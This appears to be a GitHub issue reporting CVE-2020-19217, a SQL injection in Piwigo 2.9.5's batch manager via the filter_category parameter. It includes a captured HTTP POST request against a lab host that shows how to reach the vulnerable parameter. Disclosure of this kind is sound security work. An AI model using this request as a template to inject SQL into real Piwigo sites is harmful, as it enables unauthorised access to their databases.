Headline
CVE-2020-19217: SQL injection in admin/batch_manager.php · Issue #1012 · Piwigo/Piwigo
SQL Injection vulnerability in admin/batch_manager.php in piwigo v2.9.5, via the filter_category parameter to admin.php?page=batch_manager.
hi,There is a vulnerability in the admin/batch_manager.php.
I didn’t find the full trigger request in the browser, so I added the ‘&filter_category_use=on’ parameter to the request based on the code.
POST /admin.php?page=batch_manager HTTP/1.1
Host: 10.150.10.186:30002
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://10.150.10.186:30002/admin.php?page=batch_manager
Content-Type: application/x-www-form-urlencoded
Content-Length: 695
Cookie: pwg_display_thumbnail=no_display_thumbnail; pwg_id=85b6lvm6f6nqvji17k04ugkdu0
Connection: close
Upgrade-Insecure-Requests: 1
start=0&pwg_token=438d258aad10f5b13c74425475163e4e&filter_prefilter_use=on&filter_prefilter=last_import&filter_duplicate
s_date=on&filter_category=1&tag_mode=AND&filter_level=03&filter_dimension_min_width=145&filter_dimension_max_width=2560&
filter_dimension_min_height=91&filter_dimension_max_height=1440&filter_dimension_min_ratio=1.29&filter_dimension_max_rat
io=1.77&filter_search_use=on&q=&filter_filesize_use=on&filter_category_use=on&filter_filesize_min=1.3&filter_filesize_ma
x=1.3&submitFilter=&selectAction=-1&associate=1&dissociate=1&author=&title=&date_creation=2019-05-08+00%3A00%3A00&level=
0®enerateSuccess=0®enerateError=0